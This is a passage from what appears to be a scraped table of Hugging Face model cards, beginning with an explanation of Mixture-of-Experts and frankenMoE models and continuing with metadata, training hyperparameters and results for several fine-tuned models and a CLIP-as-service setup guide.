Sparse MoE layers are used instead of dense feed-forward network (FFN) layers. MoE layers have a certain number of “experts” (e.g. 8 in this "frankenMoE"), where each expert is a neural network. In practice, the experts are FFNs, but they can also be more complex networks or even a MoE itself, leading to hierarchical MoEs!
A gate network or router, that determines which tokens are sent to which expert. For example, in the image below, the token “More” is sent to the second expert, and the token "Parameters” is sent to the first network. As we’ll explore later, we can send a token to more than one expert. How to route a token to an expert is one of the big decisions when working with MoEs - the router is composed of learned parameters and is pretrained at the same time as the rest of the network.
At every layer, for every token, a router network chooses two of these groups (the “experts”) to process the token and combine their output additively.

Switch Layer
MoE layer from the [Switch Transformers paper](https://arxiv.org/abs/2101.03961)
So, to recap, in MoEs we replace every FFN layer of the transformer model with an MoE layer, which is composed of a gate network and a certain number of experts.
Although MoEs provide benefits like efficient pretraining and faster inference compared to dense models, they also come with challenges:
Training: MoEs enable significantly more compute-efficient pretraining, but they’ve historically struggled to generalize during fine-tuning, leading to overfitting.
Inference: Although a MoE might have many parameters, only some of them are used during inference. This leads to much faster inference compared to a dense model with the same number of parameters. However, all parameters need to be loaded in RAM, so memory requirements are high. For example, [given a MoE like Mixtral 8x7B](https://huggingface.co/blog/moe), we’ll need to have enough VRAM to hold a dense 47B parameter model. Why 47B parameters and not 8 x 7B = 56B? That’s because in MoE models, only the FFN layers are treated as individual experts, and the rest of the model parameters are shared. At the same time, assuming just two experts are being used per token, the inference speed (FLOPs) is like using a 12B model (as opposed to a 14B model), because it computes 2x7B matrix multiplications, but with some layers shared (more on this soon).
If all our tokens are sent to just a few popular experts, that will make training inefficient. In a normal MoE training, the gating network converges to mostly activate the same few experts. This self-reinforces as favored experts are trained quicker and hence selected more. To mitigate this, an auxiliary loss is added to encourage giving all experts equal importance. This loss ensures that all experts receive a roughly equal number of training examples. The following sections will also explore the concept of expert capacity, which introduces a threshold of how many tokens can be processed by an expert. In transformers, the auxiliary loss is exposed via the aux_loss parameter.
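To make the router/expert interplay concrete, below is a minimal, self-contained top-2 gating layer in PyTorch. It is an illustrative toy only, not the actual Mixtral or mergekit code, and it omits the auxiliary load-balancing loss discussed above; the dimensions and expert count are arbitrary placeholders.
```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class Top2MoELayer(nn.Module):
    """Toy sparse MoE layer: a linear router sends each token to 2 of n_experts FFN experts."""

    def __init__(self, d_model: int = 64, d_ff: int = 256, n_experts: int = 8):
        super().__init__()
        self.router = nn.Linear(d_model, n_experts, bias=False)
        self.experts = nn.ModuleList(
            nn.Sequential(nn.Linear(d_model, d_ff), nn.GELU(), nn.Linear(d_ff, d_model))
            for _ in range(n_experts)
        )

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        # x: (tokens, d_model); the router scores every expert for every token.
        logits = self.router(x)                    # (tokens, n_experts)
        top2 = logits.topk(2, dim=-1)              # scores + indices of the 2 chosen experts
        weights = F.softmax(top2.values, dim=-1)   # renormalise the 2 selected scores
        out = torch.zeros_like(x)
        for slot in range(2):                      # combine both experts' outputs additively
            for e, expert in enumerate(self.experts):
                mask = top2.indices[:, slot] == e  # tokens routed to expert e in this slot
                if mask.any():
                    out[mask] += weights[mask, slot].unsqueeze(-1) * expert(x[mask])
        return out

tokens = torch.randn(5, 64)          # 5 token embeddings
print(Top2MoELayer()(tokens).shape)  # torch.Size([5, 64])
```
In a full MoE the experts are trained jointly with this router; in a frankenMoE the experts are taken from existing fine-tuned models and only stitched together afterwards.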
## "Wait...but you called this a frankenMoE?"
The difference between a MoE and a "frankenMoE" lies in the fact that the router layer in a model like the one in this repo is not trained together with the experts; the experts come from models that were fine-tuned separately. |
yeye776/OndeviceAI-T5-base-simple | yeye776 | 2024-01-22T06:34:17Z | 4 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:paust/pko-t5-base",
"base_model:finetune:paust/pko-t5-base",
"license:cc-by-4.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2024-01-22T06:33:38Z | ---
license: cc-by-4.0
base_model: paust/pko-t5-base
tags:
- generated_from_trainer
model-index:
- name: OndeviceAI-T5-base-simple
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# OndeviceAI-T5-base-simple
This model is a fine-tuned version of [paust/pko-t5-base](https://huggingface.co/paust/pko-t5-base) on the None dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0007
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- gradient_accumulation_steps: 8
- total_train_batch_size: 32
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: cosine
- lr_scheduler_warmup_ratio: 0.06
- num_epochs: 10
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.2+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
CLMBR/binding-reconstruction-lstm-0 | CLMBR | 2024-01-22T06:33:22Z | 3 | 0 | transformers | [
"transformers",
"pytorch",
"rnn",
"generated_from_trainer",
"endpoints_compatible",
"region:us"
] | null | 2024-01-17T22:57:40Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-reconstruction-lstm-0
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-reconstruction-lstm-0
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.9713
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 0
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.7917 | 0.03 | 76320 | 4.7594 |
| 4.5052 | 1.03 | 152640 | 4.4768 |
| 4.3619 | 0.03 | 228960 | 4.3418 |
| 4.2784 | 1.03 | 305280 | 4.2583 |
| 4.2153 | 0.03 | 381600 | 4.2016 |
| 4.1661 | 1.03 | 457920 | 4.1610 |
| 4.1274 | 0.03 | 534240 | 4.1302 |
| 4.0963 | 1.03 | 610560 | 4.1061 |
| 4.0684 | 0.03 | 686880 | 4.0865 |
| 4.0431 | 0.03 | 763200 | 4.0708 |
| 4.0215 | 1.03 | 839520 | 4.0574 |
| 4.0052 | 0.03 | 915840 | 4.0466 |
| 3.9894 | 1.03 | 992160 | 4.0375 |
| 3.9699 | 0.03 | 1068480 | 4.0294 |
| 3.9579 | 1.03 | 1144800 | 4.0223 |
| 3.9457 | 0.03 | 1221120 | 4.0157 |
| 3.9351 | 1.03 | 1297440 | 4.0102 |
| 3.9247 | 0.03 | 1373760 | 4.0058 |
| 3.915 | 1.03 | 1450080 | 4.0019 |
| 3.9127 | 0.03 | 1526400 | 3.9982 |
| 3.9078 | 1.03 | 1602720 | 3.9946 |
| 3.9007 | 0.03 | 1679040 | 3.9920 |
| 3.8952 | 1.03 | 1755360 | 3.9902 |
| 3.8918 | 0.03 | 1831680 | 3.9876 |
| 3.8848 | 1.03 | 1908000 | 3.9858 |
| 3.8768 | 0.03 | 1984320 | 3.9841 |
| 3.8712 | 1.03 | 2060640 | 3.9824 |
| 3.8673 | 0.03 | 2136960 | 3.9810 |
| 3.8644 | 1.03 | 2213280 | 3.9792 |
| 3.8548 | 0.03 | 2289600 | 3.9779 |
| 3.851 | 1.03 | 2365920 | 3.9768 |
| 3.8478 | 0.03 | 2442240 | 3.9759 |
| 3.8441 | 1.03 | 2518560 | 3.9752 |
| 3.8411 | 0.03 | 2594880 | 3.9744 |
| 3.8374 | 1.03 | 2671200 | 3.9737 |
| 3.8405 | 0.03 | 2747520 | 3.9732 |
| 3.8411 | 1.03 | 2823840 | 3.9727 |
| 3.8386 | 0.03 | 2900160 | 3.9721 |
| 3.8389 | 1.03 | 2976480 | 3.9716 |
| 3.8384 | 0.02 | 3052726 | 3.9713 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
jinaai/clip-models | jinaai | 2024-01-22T06:32:06Z | 0 | 4 | null | [
"onnx",
"license:apache-2.0",
"region:eu"
] | null | 2023-12-29T07:32:10Z | ---
license: apache-2.0
---
# Welcome to CLIP-as-service!
[GitHub: clip-as-service](https://github.com/jina-ai/clip-as-service)
[Docs: clip-as-service](https://clip-as-service.jina.ai/#)
CLIP-as-service is a low-latency high-scalability service for embedding images and text. It can be easily integrated as a microservice into neural search solutions.
⚡ Fast: Serve CLIP models with TensorRT, ONNX runtime and PyTorch w/o JIT with 800QPS[*]. Non-blocking duplex streaming on requests and responses, designed for large data and long-running tasks.
🫐 Elastic: Horizontally scale up and down multiple CLIP models on single GPU, with automatic load balancing.
🐥 Easy-to-use: No learning curve, minimalist design on client and server. Intuitive and consistent API for image and sentence embedding.
👒 Modern: Async client support. Easily switch between gRPC, HTTP, WebSocket protocols with TLS and compression.
🍱 Integration: Smooth integration with neural search ecosystem including Jina and DocArray. Build cross-modal and multi-modal solutions in no time.
[*] with default config (single replica, PyTorch no JIT) on GeForce RTX 3090.
## Try it!
## Install
[PyPI](https://img.shields.io/pypi/v/clip_client?color=%23ffffff&label=%20) is the latest version.
Make sure you are using Python 3.7+. You can install the client and server independently. It is **not required** to install both: e.g. you can install `clip_server` on a GPU machine and `clip_client` on a local laptop.
Client
```bash
pip install clip-client
```
Server (PyTorch)
```
pip install clip-server
```
Server (ONNX)
```
pip install "clip_server[onnx]"
```
Server (TensorRT)
```
pip install nvidia-pyindex
pip install "clip_server[tensorrt]"
```
Server on [Google Colab](https://colab.research.google.com/github/jina-ai/clip-as-service/blob/main/docs/hosting/cas-on-colab.ipynb)
## Quick check
After installing, you can run the following commands for a quick connectivity check.
### Start the server
Start PyTorch Server
```bash
python -m clip_server
```
Start ONNX Server
```bash
python -m clip_server onnx-flow.yml
```
Start TensorRT Server
```bash
python -m clip_server tensorrt-flow.yml
```
The first time you start the server, it will download the default pretrained model, which may take a while depending on your network speed. You will then see address information similar to the following:
```text
╭────────────── 🔗 Endpoint ───────────────╮
│ 🔗 Protocol GRPC │
│ 🏠 Local 0.0.0.0:51000 │
│ 🔒 Private 192.168.31.62:51000 │
│ 🌍 Public 87.105.159.191:51000 │
╰──────────────────────────────────────────╯
```
This means the server is ready to serve. Note down the three addresses shown above; you will need them later.
### Connect from client
```{tip}
Depending on the location of the client and server, you may use different IP addresses:
- Client and server are on the same machine: use local address, e.g. `0.0.0.0`
- Client and server are connected to the same router: use private network address, e.g. `192.168.3.62`
- Server is in public network: use public network address, e.g. `87.105.159.191`
```
Run the following Python script:
```python
from clip_client import Client
c = Client('grpc://0.0.0.0:51000')
c.profile()
```
will give you:
```text
Roundtrip 16ms 100%
├── Client-server network 8ms 49%
└── Server 8ms 51%
├── Gateway-CLIP network 2ms 25%
└── CLIP model 6ms 75%
{'Roundtrip': 15.684750003856607, 'Client-server network': 7.684750003856607, 'Server': 8, 'Gateway-CLIP network': 2, 'CLIP model': 6}
```
It means the client and the server are now connected. Well done! |
jaswanthrk/tokenizer_BPE_16k_vocab_all_data | jaswanthrk | 2024-01-22T06:29:34Z | 0 | 0 | transformers | [
"transformers",
"license:llama2",
"endpoints_compatible",
"region:us"
] | null | 2024-01-21T19:03:20Z | ---
license: llama2
library_name: transformers
--- |
codewizardUV/comp_comp_dataset | codewizardUV | 2024-01-22T06:26:48Z | 0 | 0 | null | [
"tensorboard",
"safetensors",
"trl",
"sft",
"generated_from_trainer",
"base_model:HuggingFaceH4/zephyr-7b-beta",
"base_model:finetune:HuggingFaceH4/zephyr-7b-beta",
"license:mit",
"region:us"
] | null | 2024-01-22T06:26:16Z | ---
license: mit
base_model: HuggingFaceH4/zephyr-7b-beta
tags:
- trl
- sft
- generated_from_trainer
model-index:
- name: results
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# results
This model is a fine-tuned version of [HuggingFaceH4/zephyr-7b-beta](https://huggingface.co/HuggingFaceH4/zephyr-7b-beta) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.5273
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.00025
- train_batch_size: 4
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: constant
- lr_scheduler_warmup_ratio: 0.03
- num_epochs: 5
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:----:|:---------------:|
| 1.1126 | 0.38 | 50 | 0.9045 |
| 0.781 | 0.76 | 100 | 0.7953 |
| 0.6092 | 1.14 | 150 | 0.6737 |
| 0.5484 | 1.52 | 200 | 0.6842 |
| 0.5078 | 1.89 | 250 | 0.5686 |
| 0.3905 | 2.27 | 300 | 0.6194 |
| 0.4328 | 2.65 | 350 | 0.5543 |
| 0.3872 | 3.03 | 400 | 0.5406 |
| 0.3147 | 3.41 | 450 | 0.5504 |
| 0.3327 | 3.79 | 500 | 0.5473 |
| 0.2734 | 4.17 | 550 | 0.5514 |
| 0.2972 | 4.55 | 600 | 0.5327 |
| 0.2974 | 4.92 | 650 | 0.5273 |
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
dendimaki/bert-finetuned-locations | dendimaki | 2024-01-22T06:13:40Z | 5 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"dataset:dendimaki/apeiron-locations",
"base_model:google-bert/bert-base-uncased",
"base_model:finetune:google-bert/bert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-20T05:01:33Z | ---
license: apache-2.0
base_model: bert-base-uncased
tags:
- generated_from_trainer
model-index:
- name: bert-finetuned-locations
results: []
datasets:
- dendimaki/apeiron-locations
metrics:
- accuracy
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# bert-finetuned-locations
This model is a fine-tuned version of [bert-base-uncased](https://huggingface.co/bert-base-uncased) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 3.0
### Training results
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0 |
CLMBR/binding-reconstruction-lstm-4 | CLMBR | 2024-01-22T06:08:15Z | 3 | 0 | transformers | [
"transformers",
"pytorch",
"rnn",
"generated_from_trainer",
"endpoints_compatible",
"region:us"
] | null | 2024-01-17T22:51:00Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-reconstruction-lstm-4
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-reconstruction-lstm-4
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.9711
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 4
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.7992 | 0.03 | 76320 | 4.7644 |
| 4.5125 | 1.03 | 152640 | 4.4847 |
| 4.3702 | 0.03 | 228960 | 4.3492 |
| 4.2826 | 1.03 | 305280 | 4.2646 |
| 4.2213 | 0.03 | 381600 | 4.2080 |
| 4.1709 | 1.03 | 457920 | 4.1664 |
| 4.1309 | 0.03 | 534240 | 4.1344 |
| 4.0996 | 1.03 | 610560 | 4.1099 |
| 4.0726 | 0.03 | 686880 | 4.0901 |
| 4.0467 | 0.03 | 763200 | 4.0744 |
| 4.0258 | 1.03 | 839520 | 4.0606 |
| 4.0085 | 0.03 | 915840 | 4.0495 |
| 3.9942 | 0.03 | 992160 | 4.0401 |
| 3.9738 | 1.03 | 1068480 | 4.0315 |
| 3.9598 | 0.03 | 1144800 | 4.0241 |
| 3.9496 | 1.03 | 1221120 | 4.0183 |
| 3.9373 | 0.03 | 1297440 | 4.0131 |
| 3.9283 | 1.03 | 1373760 | 4.0088 |
| 3.9186 | 0.03 | 1450080 | 4.0037 |
| 3.9159 | 1.03 | 1526400 | 4.0002 |
| 3.9113 | 0.03 | 1602720 | 3.9975 |
| 3.9049 | 1.03 | 1679040 | 3.9944 |
| 3.8979 | 0.03 | 1755360 | 3.9918 |
| 3.8934 | 1.03 | 1831680 | 3.9899 |
| 3.8865 | 0.03 | 1908000 | 3.9874 |
| 3.8783 | 1.03 | 1984320 | 3.9855 |
| 3.8751 | 0.03 | 2060640 | 3.9838 |
| 3.8705 | 1.03 | 2136960 | 3.9821 |
| 3.865 | 0.03 | 2213280 | 3.9805 |
| 3.8558 | 1.03 | 2289600 | 3.9784 |
| 3.8509 | 0.03 | 2365920 | 3.9774 |
| 3.8505 | 1.03 | 2442240 | 3.9761 |
| 3.8449 | 0.03 | 2518560 | 3.9752 |
| 3.8438 | 1.03 | 2594880 | 3.9743 |
| 3.8394 | 0.03 | 2671200 | 3.9737 |
| 3.8414 | 1.03 | 2747520 | 3.9730 |
| 3.8425 | 0.03 | 2823840 | 3.9724 |
| 3.8403 | 1.03 | 2900160 | 3.9719 |
| 3.8389 | 0.03 | 2976480 | 3.9715 |
| 3.8378 | 1.02 | 3052726 | 3.9711 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
yesj1234/zhko_xlsr_100p_sup_a100 | yesj1234 | 2024-01-22T06:02:21Z | 7 | 0 | transformers | [
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"./train_dataset_sup.py",
"generated_from_trainer",
"base_model:facebook/wav2vec2-large-xlsr-53",
"base_model:finetune:facebook/wav2vec2-large-xlsr-53",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-01-22T05:46:51Z | ---
base_model: facebook/wav2vec2-large-xlsr-53
tags:
- automatic-speech-recognition
- ./train_dataset_sup.py
- generated_from_trainer
model-index:
- name: finetuned_model
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# finetuned_model
This model is a fine-tuned version of [facebook/wav2vec2-large-xlsr-53](https://huggingface.co/facebook/wav2vec2-large-xlsr-53) on the ./TRAIN_DATASET_SUP.PY - NA dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 4
- eval_batch_size: 8
- seed: 42
- distributed_type: multi-GPU
- num_devices: 2
- gradient_accumulation_steps: 2
- total_train_batch_size: 16
- total_eval_batch_size: 16
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 1000
- num_epochs: 30
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.2+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
CLMBR/binding-case-lstm-2 | CLMBR | 2024-01-22T06:01:02Z | 6 | 0 | transformers | [
"transformers",
"pytorch",
"rnn",
"generated_from_trainer",
"endpoints_compatible",
"region:us"
] | null | 2024-01-17T20:26:42Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-case-lstm-2
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-case-lstm-2
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.9732
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 2
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.7896 | 0.03 | 76320 | 4.7570 |
| 4.5056 | 1.03 | 152640 | 4.4776 |
| 4.3639 | 0.03 | 228960 | 4.3428 |
| 4.2748 | 1.03 | 305280 | 4.2598 |
| 4.2152 | 0.03 | 381600 | 4.2038 |
| 4.1683 | 0.03 | 457920 | 4.1630 |
| 4.1315 | 1.03 | 534240 | 4.1321 |
| 4.0972 | 0.03 | 610560 | 4.1075 |
| 4.071 | 0.03 | 686880 | 4.0878 |
| 4.0465 | 1.03 | 763200 | 4.0719 |
| 4.0256 | 0.03 | 839520 | 4.0583 |
| 4.0112 | 1.03 | 915840 | 4.0480 |
| 3.9916 | 0.03 | 992160 | 4.0378 |
| 3.9742 | 1.03 | 1068480 | 4.0300 |
| 3.9673 | 0.03 | 1144800 | 4.0234 |
| 3.9429 | 1.03 | 1221120 | 4.0180 |
| 3.9312 | 0.03 | 1297440 | 4.0124 |
| 3.9237 | 1.03 | 1373760 | 4.0079 |
| 3.9162 | 0.03 | 1450080 | 4.0047 |
| 3.9118 | 1.03 | 1526400 | 4.0011 |
| 3.9087 | 0.03 | 1602720 | 3.9978 |
| 3.9046 | 1.03 | 1679040 | 3.9952 |
| 3.8998 | 0.03 | 1755360 | 3.9928 |
| 3.8938 | 1.03 | 1831680 | 3.9903 |
| 3.8883 | 0.03 | 1908000 | 3.9883 |
| 3.8836 | 1.03 | 1984320 | 3.9859 |
| 3.8759 | 0.03 | 2060640 | 3.9840 |
| 3.8724 | 1.03 | 2136960 | 3.9824 |
| 3.8654 | 0.03 | 2213280 | 3.9808 |
| 3.8605 | 1.03 | 2289600 | 3.9793 |
| 3.8586 | 0.03 | 2365920 | 3.9784 |
| 3.8453 | 1.03 | 2442240 | 3.9775 |
| 3.8408 | 0.03 | 2518560 | 3.9766 |
| 3.8392 | 1.03 | 2594880 | 3.9762 |
| 3.8369 | 0.03 | 2671200 | 3.9754 |
| 3.8385 | 1.03 | 2747520 | 3.9749 |
| 3.8411 | 0.03 | 2823840 | 3.9744 |
| 3.84 | 0.03 | 2900160 | 3.9740 |
| 3.8412 | 1.03 | 2976480 | 3.9735 |
| 3.842 | 0.02 | 3052726 | 3.9732 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
CLMBR/binding-domain-lstm-0 | CLMBR | 2024-01-22T05:54:34Z | 1 | 0 | transformers | [
"transformers",
"pytorch",
"rnn",
"generated_from_trainer",
"endpoints_compatible",
"region:us"
] | null | 2024-01-17T22:42:02Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-domain-lstm-0
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-domain-lstm-0
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.9735
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 0
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.7977 | 0.03 | 76320 | 4.7615 |
| 4.5122 | 1.03 | 152640 | 4.4804 |
| 4.3702 | 0.03 | 228960 | 4.3456 |
| 4.2828 | 1.03 | 305280 | 4.2622 |
| 4.2219 | 0.03 | 381600 | 4.2056 |
| 4.1741 | 1.03 | 457920 | 4.1638 |
| 4.1361 | 0.03 | 534240 | 4.1324 |
| 4.1019 | 1.03 | 610560 | 4.1074 |
| 4.0734 | 0.03 | 686880 | 4.0879 |
| 4.0511 | 1.03 | 763200 | 4.0719 |
| 4.0305 | 0.03 | 839520 | 4.0593 |
| 4.0145 | 1.03 | 915840 | 4.0479 |
| 3.9977 | 0.03 | 992160 | 4.0387 |
| 3.9796 | 1.03 | 1068480 | 4.0308 |
| 3.9665 | 0.03 | 1144800 | 4.0227 |
| 3.953 | 1.03 | 1221120 | 4.0167 |
| 3.9407 | 0.03 | 1297440 | 4.0120 |
| 3.9301 | 1.03 | 1373760 | 4.0081 |
| 3.9233 | 0.03 | 1450080 | 4.0040 |
| 3.919 | 1.03 | 1526400 | 4.0004 |
| 3.9145 | 0.03 | 1602720 | 3.9975 |
| 3.9119 | 1.03 | 1679040 | 3.9947 |
| 3.9048 | 0.03 | 1755360 | 3.9919 |
| 3.8974 | 1.03 | 1831680 | 3.9893 |
| 3.8909 | 0.03 | 1908000 | 3.9872 |
| 3.8852 | 1.03 | 1984320 | 3.9859 |
| 3.8798 | 0.03 | 2060640 | 3.9846 |
| 3.8767 | 1.03 | 2136960 | 3.9831 |
| 3.8729 | 0.03 | 2213280 | 3.9818 |
| 3.8653 | 1.03 | 2289600 | 3.9808 |
| 3.86 | 0.03 | 2365920 | 3.9796 |
| 3.8572 | 1.03 | 2442240 | 3.9786 |
| 3.8499 | 0.03 | 2518560 | 3.9776 |
| 3.8451 | 1.03 | 2594880 | 3.9767 |
| 3.8444 | 0.03 | 2671200 | 3.9761 |
| 3.8457 | 1.03 | 2747520 | 3.9753 |
| 3.8482 | 0.03 | 2823840 | 3.9746 |
| 3.848 | 1.03 | 2900160 | 3.9742 |
| 3.8472 | 0.03 | 2976480 | 3.9737 |
| 3.8448 | 1.02 | 3052726 | 3.9735 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
varunsamalaNEU/taxi | varunsamalaNEU | 2024-01-22T05:49:08Z | 0 | 0 | null | [
"Taxi-v3",
"q-learning",
"reinforcement-learning",
"custom-implementation",
"model-index",
"region:us"
] | reinforcement-learning | 2024-01-22T05:41:44Z | ---
tags:
- Taxi-v3
- q-learning
- reinforcement-learning
- custom-implementation
model-index:
- name: taxi
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: Taxi-v3
type: Taxi-v3
metrics:
- type: mean_reward
value: 7.50 +/- 2.76
name: mean_reward
verified: false
---
# **Q-Learning** Agent playing **Taxi-v3**
This is a trained model of a **Q-Learning** agent playing **Taxi-v3**.
## Usage
```python
model = load_from_hub(repo_id="varunsamalaNEU/taxi", filename="q-learning.pkl")
# Don't forget to check if you need to add additional attributes (is_slippery=False etc)
env = gym.make(model["env_id"])
```
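For a concrete picture of how the downloaded Q-table drives the agent, here is a short greedy-rollout sketch that continues the snippet above. It assumes the pickled dict exposes a `qtable` entry and that `env` follows the gymnasium-style `reset`/`step` API; adjust if your setup differs.
```python
import numpy as np

qtable = np.array(model["qtable"])   # assumed key holding the (n_states, n_actions) table
state, info = env.reset()
done, total_reward = False, 0.0

while not done:
    action = int(np.argmax(qtable[state]))  # exploit: always take the best known action
    state, reward, terminated, truncated, info = env.step(action)
    total_reward += reward
    done = terminated or truncated

print(f"Episode return: {total_reward}")
```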
|
yesj1234/jako_xlsr_100p_sup_a100 | yesj1234 | 2024-01-22T05:44:30Z | 4 | 0 | transformers | [
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"./train_dataset_sup.py",
"generated_from_trainer",
"base_model:facebook/wav2vec2-large-xlsr-53",
"base_model:finetune:facebook/wav2vec2-large-xlsr-53",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-01-22T05:29:37Z | ---
base_model: facebook/wav2vec2-large-xlsr-53
tags:
- automatic-speech-recognition
- ./train_dataset_sup.py
- generated_from_trainer
model-index:
- name: finetuned_model
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# finetuned_model
This model is a fine-tuned version of [facebook/wav2vec2-large-xlsr-53](https://huggingface.co/facebook/wav2vec2-large-xlsr-53) on the ./TRAIN_DATASET_SUP.PY - NA dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 4
- eval_batch_size: 8
- seed: 42
- distributed_type: multi-GPU
- num_devices: 2
- gradient_accumulation_steps: 2
- total_train_batch_size: 16
- total_eval_batch_size: 16
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 1000
- num_epochs: 30
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.2+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
PhoenixStormJr/Megaman-NT-Warrior-Ms-Mari-RVC | PhoenixStormJr | 2024-01-22T05:27:20Z | 0 | 0 | null | [
"license:mit",
"region:us"
